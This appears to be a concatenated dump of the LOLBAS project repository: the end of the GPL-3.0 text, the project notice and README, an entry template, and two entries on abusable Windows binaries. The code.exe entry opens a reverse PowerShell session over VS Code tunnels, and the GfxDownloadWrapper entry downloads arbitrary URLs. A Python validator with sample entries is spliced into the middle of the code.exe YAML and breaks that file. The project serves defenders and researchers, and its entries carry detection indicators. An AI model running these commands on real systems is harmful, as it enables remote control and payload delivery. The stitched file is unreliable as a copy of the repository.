Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. 
If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. 
Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. 
The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. 
"Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. 
If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program.

13. Use with the GNU Affero General Public License.

Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such.

14. Revised Versions of this License.

The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns.

Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation.

If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program.

Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version.

15. Disclaimer of Warranty.

THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.

16. Limitation of Liability.

IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

17. Interpretation of Sections 15 and 16.

If the disclaimer of warranty and limitation of liability provided above cannot be given local legal effect according to their terms, reviewing courts shall apply local law that most closely approximates an absolute waiver of all civil liability in connection with the Program, unless a warranty or assumption of liability accompanies a copy of the Program in return for a fee.

END OF TERMS AND CONDITIONS

How to Apply These Terms to Your New Programs

If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms.

To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found.

Copyright (C)

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .

Also add information on how to contact you by electronic and paper mail.

If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode:

Copyright (C)
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, your program's commands might be different; for a GUI interface, you would use an "about box".

You should also get your employer (if you work as a programmer) or school, if any, to sign a "copyright disclaimer" for the program, if necessary. For more information on this, and how to apply and follow the GNU GPL, see .

The GNU General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License. But first, please read .

================================================
FILE: NOTICE.md
================================================

## Purpose

* The LOLBAS Project is a community-driven open-source resource for documenting "Living-Off-The-Land" commands and techniques that are associated with common "Living-Off-The-Land" binaries (lolbins), scripts, and libraries within Microsoft(R) Windows(R) and associated software products. This notice serves as the primary document for terms, disclaimer, usage, structure, and license acknowledgements.
* Please refer to the README.md for "Living-Off-The-Land" criteria and definition.
* "LOLBAS Project" and "LOLBAS" are used interchangeably in this document and refer to the "LOLBAS Project"

## Project License

* The LOLBAS Project is licensed under GPL 3.0. For license information, please refer to the [LICENSE file](/LICENSE).

## Definitions

* Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
* Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
* LOLBAS: Living Off The Land Binaries and Scripts
* LOLBIN: Living Off The Land Binary
* LOL/"lol": Living Off The Land

## Project Terms of Use & Disclaimers

* The content presented in the LOLBAS Project, an open-source project, is for educational and informational purposes only. By using this project, including information presented on all project pages and resources in the project repository, you agree that the project authors and maintainers shall not be liable and/or held responsible/accountable for any damages resulting from the presentation, use, or misuse of the information contained on any project pages and repository documents.
* The LOLBAS Project does NOT claim that detection resources/information provided on any project pages and repository documents offer complete and proper defensive/analytic coverage for documented and undocumented LOLBIN commands, techniques, and/or use cases.
* The LOLBAS project is a consumable resource for commercial entities, private entities, and individuals. LOLBAS includes and references resources from open and public sources to enhance content quality, however, the LOLBAS Project does not endorse any particular entity, vendor, project, group, or individual. Furthermore, use of the LOLBAS project or any LOLBAS site/repository content by commercial entities, private entities, and individuals does not imply endorsement.
* LOLBAS references and links to many external/3rd party resources. Linked sites and references are not under the control of the LOLBAS Project, and as such, the LOLBAS Project is not responsible for content of external/3rd party resource sites. Furthermore, linking of external/3rd party resources does not imply endorsement of those who manage or maintain those resources.
## Project Usage

* For consuming content on the LOLBAS Project, please refer to the content on this page, navigate to resources under [/yml](/yml), and/or visit: https://lolbas-project.github.io.
* For making a contribution to the LOLBAS Project, please refer to this notice, [README.md](/README.md), and [CONTRIBUTING.md](/CONTRIBUTING.md).

## LOLBAS Entry Structure & Information

* `Name` Field: The name of the LOL binary, script, or library resource.
* `Description` Field: A short sentence of the legitimate functionality of the 'lol' resource.
* `Author` Field: The submitter of the 'lol' resource.
* `Created` Field: The date when the 'lol' resource is submitted or this entry is created.
* `Commands` Field: Contains subfields to describe usage of the 'lol' resource. Includes:
  * `Command` (the command or sequence of commands/details needed to perform the 'lol' effect);
  * `Description` (details of the 'lol' command behavior);
  * `Usecase` (details of the use case such as the purpose and technique);
  * `Category` (LOLBAS categories include AWL Bypass - Application Control Bypass; Execute; Defense Evasion; Download; Upload; Copy; Encode; Decode; Compile; ADS - Alternate Data Stream; UAC Bypass - User Account Control Bypass; Credentials - Harvest/Dump Credentials; Reconnaissance; Tamper);
  * `Privileges` (User or Administrator level privileges required);
  * `MitreID`[^1] (MITRE (R) ATT&CK(R) Tactic/Technique mapping);
  * `OperatingSystem` (version such as Windows 10).
* `Full_Path` Field: Includes the `Path` subfield to record commonly located file system paths of the 'lol' resource.
* `Code_Sample` Field: Includes the `Code` subfield to specify a link to a code snippet (if applicable).
* `Detection` Field: Contains subfields to describe potential detection criteria of the 'lol' resource. Includes:
  * `Sigma`[^2] (a link to a Sigma detection rule on Sigma's git repository);
  * `Splunk`[^2] (a link to a Splunk detection rule on Splunk's git repository);
  * `Elastic`[^2] (a link to an Elastic detection rule on Elastic's git repository);
  * `IOC`[^3] (to provide information about indicators of compromise);
  * `Analysis`[^4] (a placeholder for linked resources - e.g. blog, gist, write-up, Twitter post, etc.).
* `Resources` Field[^5]: The `Link` subfield is a placeholder for a referenced resource link about the 'lol' resource.
* `Acknowledgement` Field: Includes the following subfields:
  * `Person` (identifies the individual who originally discovered the technique/command);
  * `Handle` (the person's Twitter handle if applicable).

[^1]: Note on MITRE(R) ATT&CK(R) Reference Model: Since the ATT&CK(R) model is widely adopted, LOLBAS attempts to map to the appropriate technique if applicable. The applicable ATT&CK(R) license appears in the 'Licenses' section.

[^2]: Note on Detection References: LOLBAS does not guarantee that a particular detection reference included by a submitter/maintainer will detect associated LOLBIN behavior. The reference is simply an acknowledgment that a resource exists, and the resource could potentially be useful for a consumer. Furthermore, LOLBAS does not endorse any referenced project over another, but rather, appreciates the efforts made by individuals and organizations for providing publicly available resources/projects. Consumers of such projects are encouraged to understand a referenced project's Terms of Use and abide by the project's licensing criteria if applicable.

[^3]: Note on Detection IOCs: LOLBAS does not guarantee that a particular detection IOC included by a submitter/maintainer will detect associated LOLBIN behavior.

[^4]: Note on Detection Analysis Links: A linked analysis resource under the Detection Field (e.g. blog, gist, write-up, etc.) and contents provided by a submitter/maintainer are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the 'Analysis' resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable.

[^5]: Note on Resource Links: A linked resource under the Resources Field (e.g. blog, gist, write-up, Twitter post, etc.) and contents provided by submitters/maintainers are not endorsed by the LOLBAS project. However, LOLBAS does appreciate the efforts made by individuals and organizations for providing publicly available resources. Consumers of the linked resource are encouraged to understand the respective resource's Terms of Use and abide by the resource's licensing criteria if applicable.

## MITRE ATT&CK License

* MITRE ATT&CK Terms of Use Link: https://attack.mitre.org/resources/terms-of-use/

LICENSE

The MITRE Corporation (MITRE) hereby grants you a non-exclusive, royalty-free license to use ATT&CK® for research, development, and commercial purposes. Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. "© 2021 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation."

DISCLAIMERS

MITRE does not claim ATT&CK enumerates all possibilities for the types of actions and behaviors documented as part of its adversary model and framework of techniques. Using the information contained within ATT&CK to address or cover full categories of techniques will not guarantee full defensive coverage as there may be undisclosed techniques or variations on existing techniques not documented by ATT&CK.

ALL DOCUMENTS AND THE INFORMATION CONTAINED THEREIN ARE PROVIDED ON AN "AS IS" BASIS AND THE CONTRIBUTOR, THE ORGANIZATION HE/SHE REPRESENTS OR IS SPONSORED BY (IF ANY), THE MITRE CORPORATION, ITS BOARD OF TRUSTEES, OFFICERS, AGENTS, AND EMPLOYEES, DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION THEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.

## Other Notices

* Microsoft(R) Windows(R) is a registered trademark of the Microsoft Corporation

================================================
FILE: README.md
================================================

# Living Off The Land Binaries and Scripts (and now also Libraries)

All the different files can be found behind a fancy frontend here: https://lolbas-project.github.io (thanks @ConsciousHacker for this bit of eyecandy and the team over at https://gtfobins.github.io/). This repo serves as a place where we maintain the YML files that are used by the fancy frontend.

## Goal

The goal of the LOLBAS project is to document every binary, script, and library that can be used for Living Off The Land techniques.

## Criteria

A LOLBin/Lib/Script must:

* Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft.
* Have extra "unexpected" functionality. It is not interesting to document intended use cases.
  * Exceptions are application whitelisting bypasses
* Have functionality that would be useful to an APT or red team

Interesting functionality can include:

* Executing code
  * Arbitrary code execution
  * Pass-through execution of other programs (unsigned) or scripts (via a LOLBin)
* Compiling code
* File operations
  * Downloading
  * Upload
  * Copy
* Persistence
  * Pass-through persistence utilizing existing LOLBin
  * Persistence (e.g. hide data in ADS, execute at logon)
* UAC bypass
* Credential theft
* Dumping process memory
* Surveillance (e.g. keylogger, network trace)
* Log evasion/modification
* DLL side-loading/hijacking without being relocated elsewhere in the filesystem.

We do not approve binaries that allow NetNTLM coercion, since most Windows binaries allow for that. The only exceptions are binaries that allow it on ports other than the default (such as rpcping) or that can allow direct credential theft.

## Contributing

If you have found a new LOLBin or LOLScript that you would like to contribute, please review the contributing guidelines located here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/CONTRIBUTING.md

A template for the required format has been provided here: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml

## The History of the LOLBin

The phrase "Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation) at [DerbyCon 3](https://www.youtube.com/watch?v=j-r6UonEkUw).

The term LOLBins came from a Twitter discussion on what to call binaries that can be used by an attacker to perform actions beyond their original purpose. Philip Goh (@MathCasualty) [proposed LOLBins](https://twitter.com/MathCasualty/status/969174982579273728). A highly scientific internet poll ensued, and after a general consensus (69%) was reached, the name was [made official](https://twitter.com/Oddvarmoe/status/985432848961343488). Jimmy (@bohops) [followed up with LOLScripts](https://twitter.com/bohops/status/984828803120881665). No poll was taken.

Common hashtags for these files are:

* #LOLBin
* #LOLBins
* #LOLScript
* #LOLScripts
* #LOLLib
* #LOLLibs

Our primary maintainer (@oddvarmoe) of this project did a talk at DerbyCon 2018 called: #Lolbins Nothing to LOL about! - https://www.youtube.com/watch?v=NiYTdmZ8GR4 This talk goes over the history of this project.

## Maintainers

The following folks help maintain the LOLBAS Project on their personal time:

* Oddvar Moe ([@oddvarmoe](https://twitter.com/Oddvarmoe))
* Jimmy Bayne ([@bohops](https://twitter.com/bohops))
* Conor Richard ([@xenosCR](https://twitter.com/xenosCR))
* Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
* Liam ([@liamsomerville](https://twitter.com/liamsomerville))
* Wietze ([@Wietze](https://twitter.com/@Wietze))
* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))

## Thanks

As with many open-source projects, this one is the product of a community and we would like to thank ours:

* The domain http://lolbins.com has been registered by an unknown individual and redirected to the old version of this project.
* The domain http://lolbas-project.com has been registered by Jimmy (@bohops).
* The logos for the project were created by Adam Nadrowski (@_sup_mane). We #@&!!@#! love them.

## Notice

* Please refer to NOTICE.md for license information

================================================
FILE: YML-Template.yml
================================================
---
Name: Binary.exe
Description: Something general about the binary
Aliases: # Optional field if any common aliases exist of the binary with nearly the same functionality,
  - Alias: Binary64.exe # but for example, is built for different architecture.
Author: The name of the person that created this file
Created: 1970-01-01 # YYYY-MM-DD (date the person created this file)
Commands:
  - Command: The command
    Description: Description of the command
    Usecase: A description of the usecase
    Category: Execute
    Privileges: Required privs
    MitreID: T1055
    OperatingSystem: Windows 10 1803, Windows 10 1703
    Tags:
      - Key1: Value1 # Optional field for one or more tags
  - Command: The second command
    Description: Description of the second command
    Usecase: A description of the usecase
    Category: AWL Bypass
    Privileges: Required privs
    MitreID: T1033
    OperatingSystem: Windows 10 All
Full_Path:
  - Path: c:\windows\system32\bin.exe
  - Path: c:\windows\syswow64\bin.exe
Code_Sample:
  - Code: http://example.com/git.txt
Detection:
  - IOC: Event ID 10
  - IOC: binary.exe spawned
  - Analysis: https://example.com/to/blog/gist/writeup/if/applicable
  - Sigma: https://example.com/to/sigma/rule/if/applicable
  - Elastic: https://example.com/to/elastic/rule/if/applicable
  - Splunk: https://example.com/to/splunk/rule/if/applicable
  - BlockRule: https://example.com/to/microsoft/block/rules/if/applicable
Resources:
  - Link: http://blogpost.com
  - Link: http://twitter.com/something
  - Link: http://example.com/Threatintelreport
Acknowledgement:
  - Person: John Doe
    Handle: '@johndoe'
  - Person: Ola Norman
    Handle: '@olaNor'

================================================
FILE: yml/HonorableMentions/Code.yml
================================================
---
Name: code.exe
Description: VSCode binary, also portable (CLI) version
Author: PfiatDe
Created: 2023-02-01
Commands:
  - Command: code.exe tunnel --accept-server-license-terms --name "tunnel-name"
    Description: Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com via websockets; command
    Usecase: Reverse PowerShell session over MS provided infrastructure.
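The entry structure laid out in NOTICE.md above (top-level `Name`, `Description`, `Author`, `Created`, `Commands`, `Full_Path`, `Detection`, `Resources`, `Acknowledgement`, and the per-command `Category`, `Privileges`, `MitreID`, ...) is what every contribution has to satisfy before the frontend can render it. The checker below is an added example, not the project's own validation workflow: it validates one parsed entry (a Python dict, the shape `yaml.safe_load` produces from a `.yml` file) against that structure. Field names and the category set are taken from NOTICE.md and YML-Template.yml in this repository; the absolute-path rule for `Full_Path`, the `@`-prefixed `Handle` rule and the "exactly one key per `Detection` item" rule are assumptions of this example. Both entries it checks are constructed for the example; the first is modeled on the VS Code tunnel entry in yml/HonorableMentions/Code.yml.

```python
"""Validate a LOLBAS-style entry against the field structure described in NOTICE.md.

Added example; not the project's own .github/workflows/validation.py.
"""
from __future__ import annotations

import re
from datetime import date

# Category values from the NOTICE.md list, spelled as YAML values (the template uses "Execute").
ALLOWED_CATEGORIES = {
    "ADS", "AWL Bypass", "Compile", "Copy", "Credentials", "Decode", "Defense Evasion",
    "Download", "Encode", "Execute", "Reconnaissance", "Tamper", "UAC Bypass", "Upload",
}
ALLOWED_PRIVILEGES = {"User", "Administrator"}
REQUIRED_TOP = ("Name", "Description", "Author", "Created", "Commands", "Full_Path")
REQUIRED_CMD = ("Command", "Description", "Usecase", "Category",
                "Privileges", "MitreID", "OperatingSystem")
DETECTION_KEYS = {"Sigma", "Splunk", "Elastic", "IOC", "Analysis", "BlockRule"}
MITRE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")            # T1218 or T1218.011
# Assumption of this example: a path is either drive-rooted or starts with an %ENV% variable.
WIN_PATH = re.compile(r"^([A-Za-z]:\\|%[A-Za-z_()]+%\\)")


def validate_entry(entry: dict) -> list[str]:
    """Return a list of problems; an empty list means the entry matches the structure."""
    errors: list[str] = []
    for key in REQUIRED_TOP:
        if key not in entry:
            errors.append(f"missing top-level field {key!r}")

    # PyYAML turns an unquoted 2023-02-01 into datetime.date; a quoted value stays a string.
    created = entry.get("Created")
    if isinstance(created, str):
        try:
            date.fromisoformat(created)
        except ValueError:
            errors.append(f"Created must be YYYY-MM-DD, got {created!r}")
    elif created is not None and not isinstance(created, date):
        errors.append(f"Created must be a date, got {created!r}")

    commands = entry.get("Commands") or []
    if not commands:
        errors.append("Commands must list at least one command")
    for i, cmd in enumerate(commands):
        for key in REQUIRED_CMD:
            if key not in cmd:
                errors.append(f"Commands[{i}] missing {key!r}")
        cat = cmd.get("Category")
        if cat is not None and cat not in ALLOWED_CATEGORIES:
            errors.append(f"Commands[{i}] unknown Category {cat!r}")
        priv = cmd.get("Privileges")
        if priv is not None and priv not in ALLOWED_PRIVILEGES:
            errors.append(f"Commands[{i}] Privileges must be User or Administrator, got {priv!r}")
        mid = cmd.get("MitreID")
        if mid is not None and not MITRE_ID.match(str(mid)):
            errors.append(f"Commands[{i}] MitreID must look like T1234 or T1234.001, got {mid!r}")

    for i, item in enumerate(entry.get("Full_Path") or []):
        path = str(item.get("Path", ""))
        if not WIN_PATH.match(path):
            errors.append(f"Full_Path[{i}] {path!r} is not an absolute Windows path")

    # Each Detection list item carries exactly one of the documented subfields.
    for i, item in enumerate(entry.get("Detection") or []):
        if len(item) != 1 or not set(item) <= DETECTION_KEYS:
            errors.append(f"Detection[{i}] must hold exactly one of {sorted(DETECTION_KEYS)}")

    for i, ack in enumerate(entry.get("Acknowledgement") or []):
        handle = ack.get("Handle")
        if handle is not None and not str(handle).startswith("@"):
            errors.append(f"Acknowledgement[{i}] Handle should start with '@', got {handle!r}")
    return errors


# Constructed sample, modeled on yml/HonorableMentions/Code.yml (author/handle are placeholders).
GOOD_ENTRY = {
    "Name": "code.exe",
    "Description": "VSCode binary, also portable (CLI) version",
    "Author": "Example Submitter",
    "Created": "2023-02-01",
    "Commands": [{
        "Command": 'code.exe tunnel --accept-server-license-terms --name "tunnel-name"',
        "Description": "Starts a reverse PowerShell connection over global.rel.tunnels.api.visualstudio.com",
        "Usecase": "Reverse PowerShell session over MS provided infrastructure.",
        "Category": "Execute", "Privileges": "User", "MitreID": "T1219.001",
        "OperatingSystem": "Windows 10, Windows 11",
    }],
    "Full_Path": [{"Path": r"C:\Program Files\Microsoft VS Code\Code.exe"}],
    "Detection": [{"IOC": "Websocket traffic to global.rel.tunnels.api.visualstudio.com"}],
    "Acknowledgement": [{"Person": "Jane Doe", "Handle": "@janedoe"}],
}

# Constructed entry carrying the mistakes a reviewer most often has to send back.
BAD_ENTRY = {
    "Name": "bin.exe", "Description": "x", "Author": "Someone",
    "Created": "01/02/2023",                      # wrong date format
    "Commands": [{
        "Command": "bin.exe /run", "Description": "runs things", "Usecase": "execution",
        "Category": "Execution",                  # template value is "Execute"
        "Privileges": "user",                     # case matters
        "MitreID": "1218",                        # missing the leading T
        "OperatingSystem": "Windows 10",
    }],
    "Full_Path": [{"Path": "bin.exe"}],           # relative path
    "Detection": [{"Sigma": "https://example.invalid/rule", "Note": "extra"}],  # two keys
}

if __name__ == "__main__":
    for name, entry in (("good", GOOD_ENTRY), ("bad", BAD_ENTRY)):
        problems = validate_entry(entry)
        print(f"{name}: {'OK' if not problems else str(len(problems)) + ' problem(s)'}")
        for p in problems:
            print("  -", p)
```

To run it over the real files, load each `yml/**/*.yml` with `yaml.safe_load` (PyYAML) and pass the result to `validate_entry`; the date branch already accepts the `datetime.date` that PyYAML produces for an unquoted `Created` value.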
    Category: Execute
    Privileges: User
    MitreID: T1219.001
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: 'C:\Users\\AppData\Local\Programs\Microsoft VS Code\Code.exe'
  - Path: C:\Program Files\Microsoft VS Code\Code.exe
  - Path: C:\Program Files (x86)\Microsoft VS Code\Code.exe
Detection:
  - IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com
  - IOC: 'Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe'
  - IOC: 'File write of code_tunnel.json which is parameterizable, but defaults to: %UserProfile%\.vscode-cli\code_tunnel.json'
Resources:
  - Link: https://badoption.eu/blog/2023/01/31/code_c2.html
  - Link: https://code.visualstudio.com/docs/remote/tunnels
  - Link: https://code.visualstudio.com/blogs/2022/12/07/remote-even-better

================================================
FILE: yml/HonorableMentions/GfxDownloadWrapper.yml
================================================
---
Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Created: 2019-12-27
Commands:
  - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
    Description: GfxDownloadWrapper.exe downloads the content returned by URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
    Usecase: Download file from internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10
Full_Path:
  - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\GfxDownloadWrapper.exe
  - Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\GfxDownloadWrapper.exe
